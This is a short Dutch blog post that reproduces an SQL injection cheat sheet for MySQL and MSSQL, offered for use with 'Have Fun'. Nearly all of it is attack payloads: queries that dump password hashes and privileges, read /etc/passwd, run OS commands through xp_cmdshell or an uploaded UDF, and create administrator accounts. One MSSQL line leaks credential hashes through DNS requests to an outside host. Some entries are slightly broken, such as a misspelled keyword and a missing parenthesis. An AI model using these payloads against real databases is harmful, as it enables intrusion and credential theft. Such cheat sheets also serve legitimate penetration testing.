Een collega en ik hebben vandaag nog eens goed gekeken naar SQL injection. Er zijn diverse sheets online te vinden waarin een aantal handige commando’s staan die te gebruiken zijn tijdens het uitvoeren van een injection. Één van deze sheets die wij altijd gebruiken staat hieronder. Have Fun :)
MySQL
| Version | SELECTt @@version |
| Comments | SELECT 1; #comment SELECT /*comment*/1; |
| Current User | SELECT user() |
| List Users | SELECT user FROM mysql.user; — priv |
| List Password Hashes | SELECT host, user, password FROM mysql.user; — priv |
| List Privileges |
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privs SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas) SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns |
| List DBA Accounts |
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER'; SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv |
| Current Database | SELECT database() |
| List Databases | SELECT schema_name FROM information_schema.schemata; SELECT distinct(db) FROM mysql.db — priv |
| List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
| List Tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
| Find Tables From Column Name | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; — find table which have a column called 'username' |
| Select Nth Row |
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 |
| Select Nth Char | SELECT substr('abcd', 3, 1); # returns c |
| Bitwise AND | SELECT 6 & 2; # returns 2 SELECT 6 & 1; # returns 0 |
|
ASCII Value -> Char |
SELECT char(65); # returns A |
| Char -> ASCII Value | SELECT ascii('A'); # returns 65 |
| Casting | SELECT cast('1' AS unsigned integer); SELECT cast('123' AS char); |
| String Concatenation | SELECT CONCAT('A','B'); #returns AB SELECT CONCAT('A','B','C'); # returns ABC |
|
If Statement |
SELECT if(1=1,'foo','bar'); — returns 'foo' |
| Case Statement | SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A |
| Avoiding Quotes | SELECT 0×414243; # returns ABC |
| Time Delay | SELECT BENCHMARK(1000000,MD5('A') |
| Make DNS Requests | Impossible? |
| Command Execution |
If mysqld is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib. The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform. |
| Local File Access | …' UNION ALL SELECT LOAD_FILE('/etc/passwd') — priv, can only read world-readable files. SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; — priv, write to file system |
| Hostname, IP Address | Impossible? |
| Create Users | CREATE USER test1 IDENTIFIED BY 'pass1'; — priv |
| Delete Users | DROP USER test1; — priv |
| Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@'%'; — priv |
| Location of DB files | SELECT @@datadir; |
MSSQL
| Version | SELECT @@version |
| Comments | SELECT 1 — comment SELECT /*comment*/1 |
| Current User | SELECT user_name(); SELECT system_user(); SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID |
| List Users | SELECT name FROM master..syslogins |
| List Password Hashes | SELECT name, password FROM master..sysxlogins — priv, mssql 2000; SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message. SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005; SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005 |
| List Privileges | TODO |
| List DBA Accounts | TODO |
| Current Database | SELECT DB_NAME() |
| List Databases | SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — for N = 0, 1, 2, … |
| List Columns | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable') |
| List Tables | SELECT name FROM master..sysobjects WHERE xtype = 'U' |
| Find Tables From Column Name | – NB: This example works only for the current database. If you wan't to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects). SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' — this lists table, column for each column containing the word 'password' |
| Select Nth Row | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row |
| Select Nth Char | SELECT substring('abcd', 3, 1) — returns c |
| Bitwise AND | SELECT 6 & 2 — returns 2 SELECT 6 & 1 — returns 0 |
|
ASCII Value -> Char |
SELECT char(0×41) — returns A |
| Char -> ASCII Value | SELECT ascii('A') – returns 65 |
| Casting | SELECT CAST('1' as int); SELECT CAST(1 as char) |
| String Concatenation | SELECT 'A' + 'B' – returns AB |
|
If Statement |
IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1 |
| Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1 |
| Avoiding Quotes | SELECT char(65)+char(66) — returns AB |
| Time Delay | WAITFOR DELAY '0:0:5' — pause for 5 seconds |
| Make DNS Requests |
declare @host varchar(800); select @host = name FROM master..syslogins; exec('xp_getfiledetails ''\' + @host + 'c$boot.ini'''); — nonpriv, works on 2000 declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\' + @host + 'c$boot.ini'''); — priv, works on 2005 – NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. |
| Command Execution |
EXEC xp_cmdshell 'net user'; — priv On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default: |
| Local File Access | CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM 'c:boot.ini'; DROP TABLE mydata; |
| Hostname, IP Address | SELECT HOST_NAME() |
| Create Users | EXEC sp_addlogin 'user', 'pass'; — priv |
| Drop Users | EXEC sp_droplogin 'user'; — priv |
| Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; — priv |
| Location of DB files | TODO |
